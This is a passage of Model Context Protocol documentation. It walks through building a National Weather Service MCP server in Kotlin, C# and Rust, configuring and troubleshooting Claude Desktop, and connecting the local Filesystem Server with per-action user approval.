System.`in`.asInput(),
System.out.asSink().buffered()
)
runBlocking {
server.connect(transport)
val done = Job()
server.onClose {
done.complete()
}
done.join()
}
}
```
### Weather API helper functions
Next, let's add functions and data classes for querying and converting responses from the National Weather Service API:
```kotlin theme={null}
// Extension function to fetch forecast information for given latitude and longitude
suspend fun HttpClient.getForecast(latitude: Double, longitude: Double): List<String> {
    val points = this.get("/points/$latitude,$longitude").body<Points>()
    val forecast = this.get(points.properties.forecast).body<Forecast>()
return forecast.properties.periods.map { period ->
"""
${period.name}:
Temperature: ${period.temperature} ${period.temperatureUnit}
Wind: ${period.windSpeed} ${period.windDirection}
Forecast: ${period.detailedForecast}
""".trimIndent()
}
}
// Extension function to fetch weather alerts for a given state
suspend fun HttpClient.getAlerts(state: String): List<String> {
    val alerts = this.get("/alerts/active/area/$state").body<Alert>()
return alerts.features.map { feature ->
"""
Event: ${feature.properties.event}
Area: ${feature.properties.areaDesc}
Severity: ${feature.properties.severity}
Description: ${feature.properties.description}
Instruction: ${feature.properties.instruction}
""".trimIndent()
}
}
@Serializable
data class Points(
val properties: Properties
) {
@Serializable
data class Properties(val forecast: String)
}
@Serializable
data class Forecast(
val properties: Properties
) {
@Serializable
    data class Properties(val periods: List<Period>)
@Serializable
data class Period(
val number: Int, val name: String, val startTime: String, val endTime: String,
val isDaytime: Boolean, val temperature: Int, val temperatureUnit: String,
val temperatureTrend: String, val probabilityOfPrecipitation: JsonObject,
val windSpeed: String, val windDirection: String,
val shortForecast: String, val detailedForecast: String,
)
}
@Serializable
data class Alert(
    val features: List<Feature>
) {
@Serializable
data class Feature(
val properties: Properties
)
@Serializable
data class Properties(
val event: String, val areaDesc: String, val severity: String,
val description: String, val instruction: String?,
)
}
```
### Implementing tool execution
The tool execution handler is responsible for actually executing the logic of each tool. Let's add it:
```kotlin theme={null}
// Create an HTTP client with a default request configuration and JSON content negotiation
val httpClient = HttpClient {
defaultRequest {
url("https://api.weather.gov")
headers {
append("Accept", "application/geo+json")
append("User-Agent", "WeatherApiClient/1.0")
}
contentType(ContentType.Application.Json)
}
// Install content negotiation plugin for JSON serialization/deserialization
install(ContentNegotiation) { json(Json { ignoreUnknownKeys = true }) }
}
// Register a tool to fetch weather alerts by state
server.addTool(
name = "get_alerts",
description = """
        Get weather alerts for a US state. Input is a two-letter US state code (e.g. CA, NY)
""".trimIndent(),
inputSchema = Tool.Input(
properties = buildJsonObject {
putJsonObject("state") {
put("type", "string")
put("description", "Two-letter US state code (e.g. CA, NY)")
}
},
required = listOf("state")
)
) { request ->
val state = request.arguments["state"]?.jsonPrimitive?.content
if (state == null) {
return@addTool CallToolResult(
content = listOf(TextContent("The 'state' parameter is required."))
)
}
val alerts = httpClient.getAlerts(state)
CallToolResult(content = alerts.map { TextContent(it) })
}
// Register a tool to fetch weather forecast by latitude and longitude
server.addTool(
name = "get_forecast",
description = """
Get weather forecast for a specific latitude/longitude
""".trimIndent(),
inputSchema = Tool.Input(
properties = buildJsonObject {
putJsonObject("latitude") { put("type", "number") }
putJsonObject("longitude") { put("type", "number") }
},
required = listOf("latitude", "longitude")
)
) { request ->
val latitude = request.arguments["latitude"]?.jsonPrimitive?.doubleOrNull
val longitude = request.arguments["longitude"]?.jsonPrimitive?.doubleOrNull
if (latitude == null || longitude == null) {
return@addTool CallToolResult(
content = listOf(TextContent("The 'latitude' and 'longitude' parameters are required."))
)
}
val forecast = httpClient.getForecast(latitude, longitude)
CallToolResult(content = forecast.map { TextContent(it) })
}
```
### Running the server
Finally, implement the main function to run the server:
```kotlin theme={null}
fun main() = `run mcp server`()
```
Make sure to run `./gradlew build` to build your server. Claude for Desktop launches the built jar, so this step is required before your server can connect.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use.
To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor.
Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key.
The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "java",
"args": [
"-jar",
"/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/libs/weather-0.1.0-all.jar"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "java",
"args": [
"-jar",
"C:\\PATH\\TO\\PARENT\\FOLDER\\weather\\build\\libs\\weather-0.1.0-all.jar"
]
}
}
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `java -jar /ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/build/libs/weather-0.1.0-all.jar`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/csharp-sdk/tree/main/samples/QuickstartWeatherServer)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* C#
* LLMs like Claude
* .NET 8 or higher
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `fmt.Println()` in Go
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files
### System requirements
* [.NET 8 SDK](https://dotnet.microsoft.com/download/dotnet/8.0) or higher installed.
### Set up your environment
First, let's install `dotnet` if you haven't already. You can download `dotnet` from the [official Microsoft .NET website](https://dotnet.microsoft.com/download/). Verify your `dotnet` installation:
```bash theme={null}
dotnet --version
```
Now, let's create and set up your project:
```bash macOS/Linux theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new C# project
dotnet new console
```
```powershell Windows theme={null}
# Create a new directory for our project
mkdir weather
cd weather
# Initialize a new C# project
dotnet new console
```
After running `dotnet new console`, you will be presented with a new C# project.
You can open the project in your favorite IDE, such as [Visual Studio](https://visualstudio.microsoft.com/) or [Rider](https://www.jetbrains.com/rider/).
Alternatively, you can create a C# application using the [Visual Studio project wizard](https://learn.microsoft.com/en-us/visualstudio/get-started/csharp/tutorial-console?view=vs-2022).
After creating the project, add the NuGet packages for the Model Context Protocol SDK and hosting:
```bash theme={null}
# Add the Model Context Protocol SDK NuGet package
dotnet add package ModelContextProtocol --prerelease
# Add the .NET Hosting NuGet package
dotnet add package Microsoft.Extensions.Hosting
```
Now let's dive into building your server.
## Building your server
Open the `Program.cs` file in your project and replace its contents with the following code:
```csharp theme={null}
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Hosting;
using ModelContextProtocol;
using System.Net.Http.Headers;
var builder = Host.CreateEmptyApplicationBuilder(settings: null);
builder.Services.AddMcpServer()
.WithStdioServerTransport()
.WithToolsFromAssembly();
builder.Services.AddSingleton(_ =>
{
var client = new HttpClient() { BaseAddress = new Uri("https://api.weather.gov") };
client.DefaultRequestHeaders.UserAgent.Add(new ProductInfoHeaderValue("weather-tool", "1.0"));
return client;
});
var app = builder.Build();
await app.RunAsync();
```
When creating the `HostApplicationBuilder`, ensure you use `CreateEmptyApplicationBuilder` instead of `CreateDefaultBuilder`. This ensures that the server does not write any additional messages to the console. This is only necessary for servers using the STDIO transport.
This code sets up a basic console application that uses the Model Context Protocol SDK to create an MCP server with standard I/O transport.
### Weather API helper functions
Create an extension class for `HttpClient` which helps simplify JSON request handling:
```csharp theme={null}
using System.Text.Json;
internal static class HttpClientExt
{
    public static async Task<JsonDocument> ReadJsonDocumentAsync(this HttpClient client, string requestUri)
{
using var response = await client.GetAsync(requestUri);
response.EnsureSuccessStatusCode();
return await JsonDocument.ParseAsync(await response.Content.ReadAsStreamAsync());
}
}
```
Next, define a class with the tool execution handlers for querying and converting responses from the National Weather Service API:
```csharp theme={null}
using ModelContextProtocol.Server;
using System.ComponentModel;
using System.Globalization;
using System.Text.Json;
namespace QuickstartWeatherServer.Tools;
[McpServerToolType]
public static class WeatherTools
{
[McpServerTool, Description("Get weather alerts for a US state code.")]
    public static async Task<string> GetAlerts(
HttpClient client,
[Description("The US state code to get alerts for.")] string state)
{
using var jsonDocument = await client.ReadJsonDocumentAsync($"/alerts/active/area/{state}");
var jsonElement = jsonDocument.RootElement;
var alerts = jsonElement.GetProperty("features").EnumerateArray();
if (!alerts.Any())
{
return "No active alerts for this state.";
}
return string.Join("\n--\n", alerts.Select(alert =>
{
JsonElement properties = alert.GetProperty("properties");
return $"""
Event: {properties.GetProperty("event").GetString()}
Area: {properties.GetProperty("areaDesc").GetString()}
Severity: {properties.GetProperty("severity").GetString()}
Description: {properties.GetProperty("description").GetString()}
Instruction: {properties.GetProperty("instruction").GetString()}
""";
}));
}
[McpServerTool, Description("Get weather forecast for a location.")]
    public static async Task<string> GetForecast(
HttpClient client,
[Description("Latitude of the location.")] double latitude,
[Description("Longitude of the location.")] double longitude)
{
var pointUrl = string.Create(CultureInfo.InvariantCulture, $"/points/{latitude},{longitude}");
using var jsonDocument = await client.ReadJsonDocumentAsync(pointUrl);
var forecastUrl = jsonDocument.RootElement.GetProperty("properties").GetProperty("forecast").GetString()
?? throw new Exception($"No forecast URL provided by {client.BaseAddress}points/{latitude},{longitude}");
using var forecastDocument = await client.ReadJsonDocumentAsync(forecastUrl);
var periods = forecastDocument.RootElement.GetProperty("properties").GetProperty("periods").EnumerateArray();
return string.Join("\n---\n", periods.Select(period => $"""
{period.GetProperty("name").GetString()}
Temperature: {period.GetProperty("temperature").GetInt32()}°F
Wind: {period.GetProperty("windSpeed").GetString()} {period.GetProperty("windDirection").GetString()}
Forecast: {period.GetProperty("detailedForecast").GetString()}
"""));
}
}
```
### Running the server
Finally, run the server using the following command:
```bash theme={null}
dotnet run
```
This will start the server and listen for incoming requests on standard input/output.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version
here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "dotnet",
"args": ["run", "--project", "/ABSOLUTE/PATH/TO/PROJECT", "--no-build"]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "dotnet",
"args": [
"run",
"--project",
"C:\\ABSOLUTE\\PATH\\TO\\PROJECT",
"--no-build"
]
}
}
}
```
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running `dotnet run --project /ABSOLUTE/PATH/TO/PROJECT --no-build`
Save the file, and restart **Claude for Desktop**.
Let's get started with building our weather server! [You can find the complete code for what we'll be building here.](https://github.com/modelcontextprotocol/quickstart-resources/tree/main/weather-server-rust)
### Prerequisite knowledge
This quickstart assumes you have familiarity with:
* Rust programming language
* Async/await in Rust
* LLMs like Claude
### Logging in MCP Servers
When implementing MCP servers, be careful about how you handle logging:
**For STDIO-based servers:** Never write to standard output (stdout). This includes:
* `print()` statements in Python
* `console.log()` in JavaScript
* `println!()` in Rust
* Similar stdout functions in other languages
Writing to stdout will corrupt the JSON-RPC messages and break your server.
**For HTTP-based servers:** Standard output logging is fine since it doesn't interfere with HTTP responses.
### Best Practices
1. Use a logging library that writes to stderr or files, such as `tracing` or `log` in Rust.
2. Configure your logging framework to avoid stdout output.
### Quick Examples
```rust theme={null}
// ❌ Bad (STDIO)
println!("Processing request");
// ✅ Good (STDIO)
use tracing::info;
info!("Processing request"); // writes to stderr
```
### System requirements
* Rust 1.85 or higher installed (required by the 2024 edition used below).
* Cargo (comes with Rust installation).
### Set up your environment
First, let's install Rust if you haven't already. You can install Rust from [rust-lang.org](https://www.rust-lang.org/tools/install):
```bash macOS/Linux theme={null}
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
```
```powershell Windows theme={null}
# Download and run rustup-init.exe from https://rustup.rs/
```
Verify your Rust installation:
```bash theme={null}
rustc --version
cargo --version
```
Now, let's create and set up our project:
```bash macOS/Linux theme={null}
# Create a new Rust project
cargo new weather
cd weather
```
```powershell Windows theme={null}
# Create a new Rust project
cargo new weather
cd weather
```
Update your `Cargo.toml` to add the required dependencies:
```toml Cargo.toml theme={null}
[package]
name = "weather"
version = "0.1.0"
edition = "2024"
[dependencies]
rmcp = { version = "0.3", features = ["server", "macros", "transport-io"] }
tokio = { version = "1.46", features = ["full"] }
reqwest = { version = "0.12", features = ["json"] }
serde = { version = "1.0", features = ["derive"] }
serde_json = "1.0"
anyhow = "1.0"
tracing = "0.1"
tracing-subscriber = { version = "0.3", features = ["env-filter", "std", "fmt"] }
```
Now let's dive into building your server.
## Building your server
### Importing packages and constants
Open `src/main.rs` and add these imports and constants at the top:
```rust theme={null}
use anyhow::Result;
use rmcp::{
ServerHandler, ServiceExt,
handler::server::{router::tool::ToolRouter, tool::Parameters},
model::*,
schemars, tool, tool_handler, tool_router,
};
use serde::Deserialize;
use serde::de::DeserializeOwned;
const NWS_API_BASE: &str = "https://api.weather.gov";
const USER_AGENT: &str = "weather-app/1.0";
```
The `rmcp` crate provides the Model Context Protocol SDK for Rust, with features for server implementation, procedural macros, and stdio transport.
### Data structures
Next, let's define the data structures for deserializing responses from the National Weather Service API:
```rust theme={null}
#[derive(Debug, Deserialize)]
struct AlertsResponse {
    features: Vec<AlertFeature>,
}
#[derive(Debug, Deserialize)]
struct AlertFeature {
properties: AlertProperties,
}
#[derive(Debug, Deserialize)]
struct AlertProperties {
    event: Option<String>,
    #[serde(rename = "areaDesc")]
    area_desc: Option<String>,
    severity: Option<String>,
    description: Option<String>,
    instruction: Option<String>,
}
#[derive(Debug, Deserialize)]
struct PointsResponse {
properties: PointsProperties,
}
#[derive(Debug, Deserialize)]
struct PointsProperties {
forecast: String,
}
#[derive(Debug, Deserialize)]
struct ForecastResponse {
properties: ForecastProperties,
}
#[derive(Debug, Deserialize)]
struct ForecastProperties {
    periods: Vec<ForecastPeriod>,
}
#[derive(Debug, Deserialize)]
struct ForecastPeriod {
name: String,
temperature: i32,
#[serde(rename = "temperatureUnit")]
temperature_unit: String,
#[serde(rename = "windSpeed")]
wind_speed: String,
#[serde(rename = "windDirection")]
wind_direction: String,
#[serde(rename = "detailedForecast")]
detailed_forecast: String,
}
```
Now define the request types that MCP clients will send:
```rust theme={null}
#[derive(serde::Deserialize, schemars::JsonSchema)]
pub struct MCPForecastRequest {
latitude: f32,
longitude: f32,
}
#[derive(serde::Deserialize, schemars::JsonSchema)]
pub struct MCPAlertRequest {
state: String,
}
```
### Helper functions
Add helper functions for making API requests and formatting responses:
```rust theme={null}
async fn make_nws_request<T: DeserializeOwned>(url: &str) -> Result<T> {
let client = reqwest::Client::new();
let rsp = client
.get(url)
.header(reqwest::header::USER_AGENT, USER_AGENT)
.header(reqwest::header::ACCEPT, "application/geo+json")
.send()
.await?
.error_for_status()?;
    Ok(rsp.json::<T>().await?)
}
fn format_alert(feature: &AlertFeature) -> String {
let props = &feature.properties;
format!(
"Event: {}\nArea: {}\nSeverity: {}\nDescription: {}\nInstructions: {}",
props.event.as_deref().unwrap_or("Unknown"),
props.area_desc.as_deref().unwrap_or("Unknown"),
props.severity.as_deref().unwrap_or("Unknown"),
props
.description
.as_deref()
.unwrap_or("No description available"),
props
.instruction
.as_deref()
.unwrap_or("No specific instructions provided")
)
}
fn format_period(period: &ForecastPeriod) -> String {
format!(
"{}:\nTemperature: {}°{}\nWind: {} {}\nForecast: {}",
period.name,
period.temperature,
period.temperature_unit,
period.wind_speed,
period.wind_direction,
period.detailed_forecast
)
}
```
### Implementing the Weather server and tools
Now let's implement the main Weather server struct with the tool handlers:
```rust theme={null}
pub struct Weather {
    tool_router: ToolRouter<Weather>,
}
#[tool_router]
impl Weather {
fn new() -> Self {
Self {
tool_router: Self::tool_router(),
}
}
#[tool(description = "Get weather alerts for a US state.")]
async fn get_alerts(
&self,
        Parameters(MCPAlertRequest { state }): Parameters<MCPAlertRequest>,
) -> String {
let url = format!(
"{}/alerts/active/area/{}",
NWS_API_BASE,
state.to_uppercase()
);
        match make_nws_request::<AlertsResponse>(&url).await {
Ok(data) => {
if data.features.is_empty() {
"No active alerts for this state.".to_string()
} else {
data.features
.iter()
.map(format_alert)
                        .collect::<Vec<String>>()
.join("\n---\n")
}
}
Err(_) => "Unable to fetch alerts or no alerts found.".to_string(),
}
}
#[tool(description = "Get weather forecast for a location.")]
async fn get_forecast(
&self,
        Parameters(MCPForecastRequest {
            latitude,
            longitude,
        }): Parameters<MCPForecastRequest>,
) -> String {
let points_url = format!("{NWS_API_BASE}/points/{latitude},{longitude}");
        let Ok(points_data) = make_nws_request::<PointsResponse>(&points_url).await else {
return "Unable to fetch forecast data for this location.".to_string();
};
let forecast_url = points_data.properties.forecast;
        let Ok(forecast_data) = make_nws_request::<ForecastResponse>(&forecast_url).await else {
return "Unable to fetch forecast data for this location.".to_string();
};
let periods = &forecast_data.properties.periods;
let forecast_summary: String = periods
.iter()
.take(5) // Next 5 periods only
.map(format_period)
            .collect::<Vec<String>>()
.join("\n---\n");
forecast_summary
}
}
```
The `#[tool_router]` macro automatically generates the routing logic, and the `#[tool]` attribute marks methods as MCP tools.
### Implementing the ServerHandler
Implement the `ServerHandler` trait to define server capabilities:
```rust theme={null}
#[tool_handler]
impl ServerHandler for Weather {
fn get_info(&self) -> ServerInfo {
ServerInfo {
capabilities: ServerCapabilities::builder().enable_tools().build(),
..Default::default()
}
}
}
```
### Running the server
Finally, implement the main function to run the server with stdio transport:
```rust theme={null}
#[tokio::main]
async fn main() -> Result<()> {
let transport = (tokio::io::stdin(), tokio::io::stdout());
let service = Weather::new().serve(transport).await?;
service.waiting().await?;
Ok(())
}
```
Build your server with:
```bash theme={null}
cargo build --release
```
The compiled binary will be in `target/release/weather`.
Let's now test your server from an existing MCP host, Claude for Desktop.
## Testing your server with Claude for Desktop
Claude for Desktop is not yet available on Linux. Linux users can proceed to the [Building a client](/docs/develop/build-client) tutorial to build an MCP client that connects to the server we just built.
First, make sure you have Claude for Desktop installed. [You can install the latest version here.](https://claude.ai/download) If you already have Claude for Desktop, **make sure it's updated to the latest version.**
We'll need to configure Claude for Desktop for whichever MCP servers you want to use. To do this, open your Claude for Desktop App configuration at `~/Library/Application Support/Claude/claude_desktop_config.json` in a text editor. Make sure to create the file if it doesn't exist.
For example, if you have [VS Code](https://code.visualstudio.com/) installed:
```bash macOS/Linux theme={null}
code ~/Library/Application\ Support/Claude/claude_desktop_config.json
```
```powershell Windows theme={null}
code $env:AppData\Claude\claude_desktop_config.json
```
You'll then add your servers in the `mcpServers` key. The MCP UI elements will only show up in Claude for Desktop if at least one server is properly configured.
In this case, we'll add our single weather server like so:
```json macOS/Linux theme={null}
{
"mcpServers": {
"weather": {
"command": "/ABSOLUTE/PATH/TO/PARENT/FOLDER/weather/target/release/weather"
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"weather": {
"command": "C:\\ABSOLUTE\\PATH\\TO\\PARENT\\FOLDER\\weather\\target\\release\\weather.exe"
}
}
}
```
Make sure you pass in the absolute path to your compiled binary. You can get this by running `pwd` on macOS/Linux or `cd` on Windows Command Prompt from your project directory. On Windows, remember to use double backslashes (`\\`) or forward slashes (`/`) in the JSON path, and add the `.exe` extension.
This tells Claude for Desktop:
1. There's an MCP server named "weather"
2. Launch it by running the compiled binary at the specified path
Save the file, and restart **Claude for Desktop**.
### Test with commands
Let's make sure Claude for Desktop is picking up the two tools we've exposed in our `weather` server. You can do this by looking for the "Add files, connectors, and more /" icon:
After clicking on the plus icon, hover over the "Connectors" menu. You should see the `weather` server listed:
If your server isn't being picked up by Claude for Desktop, proceed to the [Troubleshooting](#troubleshooting) section for debugging tips.
If the server has shown up in the "Connectors" menu, you can now test your server by running the following commands in Claude for Desktop:
* What's the weather in Sacramento?
* What are the active weather alerts in Texas?
Since this is the US National Weather Service, the queries will only work for US locations.
## What's happening under the hood
When you ask a question:
1. The client sends your question to Claude
2. Claude analyzes the available tools and decides which one(s) to use
3. The client executes the chosen tool(s) through the MCP server
4. The results are sent back to Claude
5. Claude formulates a natural language response
6. The response is displayed to you!
## Troubleshooting
**Getting logs from Claude for Desktop**
Claude.app logging related to MCP is written to log files in `~/Library/Logs/Claude`:
* `mcp.log` will contain general logging about MCP connections and connection failures.
* Files named `mcp-server-SERVERNAME.log` will contain error (stderr) logging from the named server.
You can run the following command to list recent logs and follow along with any new ones:
```bash theme={null}
# Check Claude's logs for errors
tail -n 20 -f ~/Library/Logs/Claude/mcp*.log
```
**Server not showing up in Claude**
1. Check your `claude_desktop_config.json` file syntax
2. Make sure the path to your project is absolute and not relative
3. Restart Claude for Desktop completely
To properly restart Claude for Desktop, you must fully quit the application:
* **Windows**: Right-click the Claude icon in the system tray (which may be hidden in the "hidden icons" menu) and select "Quit" or "Exit".
* **macOS**: Use Cmd+Q or select "Quit Claude" from the menu bar.
Simply closing the window does not fully quit the application, and your MCP server configuration changes will not take effect.
**Tool calls failing silently**
If Claude attempts to use the tools but they fail:
1. Check Claude's logs for errors
2. Verify your server builds and runs without errors
3. Try restarting Claude for Desktop
**None of this is working. What do I do?**
Please refer to our [debugging guide](/legacy/tools/debugging) for better debugging tools and more detailed guidance.
**Error: Failed to retrieve grid point data**
This usually means either:
1. The coordinates are outside the US
2. The NWS API is having issues
3. You're being rate limited
Fix:
* Verify you're using US coordinates
* Add a small delay between requests
* Check the NWS API status page
**Error: No active alerts for \[STATE]**
This isn't an error - it just means there are no current weather alerts for that state. Try a different state or check during severe weather.
For more advanced troubleshooting, check out our guide on [Debugging MCP](/legacy/tools/debugging).
## Next steps
* Learn how to build your own MCP client that can connect to your server
* Check out our gallery of official MCP servers and implementations
* Learn how to effectively debug MCP servers and integrations
* Learn how to use LLMs like Claude to speed up your MCP development
# Connect to local MCP servers
Source: https://modelcontextprotocol.io/docs/develop/connect-local-servers
Learn how to extend Claude Desktop with local MCP servers to enable file system access and other powerful integrations
Model Context Protocol (MCP) servers extend AI applications' capabilities by providing secure, controlled access to local resources and tools. Many clients support MCP, enabling diverse integration possibilities across different platforms and applications.
This guide demonstrates how to connect to local MCP servers using Claude Desktop as an example, one of the [many clients that support MCP](/clients). While we focus on Claude Desktop's implementation, the concepts apply broadly to other MCP-compatible clients. By the end of this tutorial, Claude will be able to interact with files on your computer, create new documents, organize folders, and search through your file system—all with your explicit permission for each action.
## Prerequisites
Before starting this tutorial, ensure you have the following installed on your system:
### Claude Desktop
Download and install [Claude Desktop](https://claude.ai/download) for your operating system. Claude Desktop is available for macOS and Windows.
If you already have Claude Desktop installed, verify you're running the latest version by clicking the Claude menu and selecting "Check for Updates..."
### Node.js
The Filesystem Server and many other MCP servers require Node.js to run. Verify your Node.js installation by opening a terminal or command prompt and running:
```bash theme={null}
node --version
```
If Node.js is not installed, download it from [nodejs.org](https://nodejs.org/). We recommend the LTS (Long Term Support) version for stability.
## Understanding MCP Servers
MCP servers are programs that run on your computer and provide specific capabilities to Claude Desktop through a standardized protocol. Each server exposes tools that Claude can use to perform actions, with your approval. The Filesystem Server we'll install provides tools for:
* Reading file contents and directory structures
* Creating new files and directories
* Moving and renaming files
* Searching for files by name or content
All actions require your explicit approval before execution, ensuring you maintain full control over what Claude can access and modify.
## Installing the Filesystem Server
The process involves configuring Claude Desktop to automatically start the Filesystem Server whenever you launch the application. This configuration is done through a JSON file that tells Claude Desktop which servers to run and how to connect to them.
Start by accessing the Claude Desktop settings. Click on the Claude menu in your system's menu bar (not the settings within the Claude window itself) and select "Settings..."
On macOS, this appears in the top menu bar:
This opens the Claude Desktop configuration window, which is separate from your Claude account settings.
In the Settings window, navigate to the "Developer" tab in the left sidebar. This section contains options for configuring MCP servers and other developer features.
Click the "Edit Config" button to open the configuration file:
This action creates a new configuration file if one doesn't exist, or opens your existing configuration. The file is located at:
* **macOS**: `~/Library/Application Support/Claude/claude_desktop_config.json`
* **Windows**: `%APPDATA%\Claude\claude_desktop_config.json`
Replace the contents of the configuration file with the following JSON structure. This configuration tells Claude Desktop to start the Filesystem Server with access to specific directories:
```json macOS theme={null}
{
"mcpServers": {
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"/Users/username/Desktop",
"/Users/username/Downloads"
]
}
}
}
```
```json Windows theme={null}
{
"mcpServers": {
"filesystem": {
"command": "npx",
"args": [
"-y",
"@modelcontextprotocol/server-filesystem",
"C:\\Users\\username\\Desktop",
"C:\\Users\\username\\Downloads"
]
}
}
}
```
Replace `username` with your actual computer username. The paths listed in the `args` array specify which directories the Filesystem Server can access. You can modify these paths or add additional directories as needed.
**Understanding the Configuration**
* `"filesystem"`: A friendly name for the server that appears in Claude Desktop
* `"command": "npx"`: Uses Node.js's npx tool to run the server
* `"-y"`: Automatically confirms the installation of the server package
* `"@modelcontextprotocol/server-filesystem"`: The package name of the Filesystem Server
* The remaining arguments: Directories the server is allowed to access
**Security Consideration**
Only grant access to directories you're comfortable with Claude reading and modifying. The server runs with your user account permissions, so it can perform any file operations you can perform manually.
After saving the configuration file, completely quit Claude Desktop and restart it. The application needs to restart to load the new configuration and start the MCP server.
Upon successful restart, you'll see an MCP server indicator in the bottom-right corner of the conversation input box:
Click on this indicator to view the available tools provided by the Filesystem Server:
If the server indicator doesn't appear, refer to the [Troubleshooting](#troubleshooting) section for debugging steps.
## Using the Filesystem Server
With the Filesystem Server connected, Claude can now interact with your file system. Try these example requests to explore the capabilities:
### File Management Examples
* **"Can you write a poem and save it to my desktop?"** - Claude will compose a poem and create a new text file on your desktop
* **"What work-related files are in my downloads folder?"** - Claude will scan your downloads and identify work-related documents
* **"Please organize all images on my desktop into a new folder called 'Images'"** - Claude will create a folder and move image files into it
### How Approval Works
Before executing any file system operation, Claude will request your approval. This ensures you maintain control over all actions:
Review each request carefully before approving. You can always deny a request if you're not comfortable with the proposed action.
## Troubleshooting
If you encounter issues setting up or using the Filesystem Server, these solutions address common problems:
1. Restart Claude Desktop completely
2. Check your `claude_desktop_config.json` file syntax
3. Make sure the file paths included in `claude_desktop_config.json` are valid and that they are absolute and not relative
4. Look at [logs](#getting-logs-from-claude-for-desktop) to see why the server is not connecting
5. In your command line, try manually running the server (replacing `username` as you did in `claude_desktop_config.json`) to see if you get any errors:
```bash macOS/Linux theme={null}
npx -y @modelcontextprotocol/server-filesystem /Users/username/Desktop /Users/username/Downloads
```
```powershell Windows theme={null}
npx -y @modelcontextprotocol/server-filesystem C:\Users\username\Desktop C:\Users\username\Downloads
```
Claude.app logging related to MCP is written to log files in:
* macOS: `~/Library/Logs/Claude`
* Windows: `%APPDATA%\Claude\logs`
* `mcp.log` will contain general logging about MCP connections and connection failures.
* Files named `mcp-server-SERVERNAME.log` will contain error (stderr) logging from the named server.
You can run the following command to list recent logs and follow along with any new ones (on Windows, it will only show recent logs):
```bash macOS/Linux theme={null}
tail -n 20 -f ~/Library/Logs/Claude/mcp*.log
```
```powershell Windows theme={null}
type "%APPDATA%\Claude\logs\mcp*.log"
```
If Claude attempts to use the tools but they fail:
1. Check Claude's logs for errors
2. Verify your server builds and runs without errors
3. Try restarting Claude Desktop
Please refer to our [debugging guide](/legacy/tools/debugging) for better debugging tools and more detailed guidance.
If your configured server fails to load, and you see within its logs an error referring to `${APPDATA}` within a path, you may need to add the expanded value of `%APPDATA%` to your `env` key in `claude_desktop_config.json`:
```json theme={null}
{
"brave-search": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-brave-search"],
"env": {
"APPDATA": "C:\\Users\\user\\AppData\\Roaming\\",
"BRAVE_API_KEY": "..."
}
}
}
```
With this change in place, launch Claude Desktop once again.
**npm should be installed globally**
The `npx` command may continue to fail if you have not installed npm globally. If npm is already installed globally, you will find `%APPDATA%\npm` exists on your system. If not, you can install npm globally by running the following command:
```bash theme={null}
npm install -g npm
```
## Next Steps
Now that you've successfully connected Claude Desktop to a local MCP server, explore these options to expand your setup:
* Browse our collection of official and community-created MCP servers for additional capabilities
* Create custom MCP servers tailored to your specific workflows and integrations
* Learn how to connect Claude to remote MCP servers for cloud-based tools and services
* Dive deeper into how MCP works and its architecture
# Connect to remote MCP Servers
Source: https://modelcontextprotocol.io/docs/develop/connect-remote-servers
Learn how to connect Claude to remote MCP servers and extend its capabilities with internet-hosted tools and data sources
Remote MCP servers extend AI applications' capabilities beyond your local environment, providing access to internet-hosted tools, services, and data sources. By connecting to remote MCP servers, you transform AI assistants from helpful tools into informed teammates capable of handling complex, multi-step projects with real-time access to external resources.
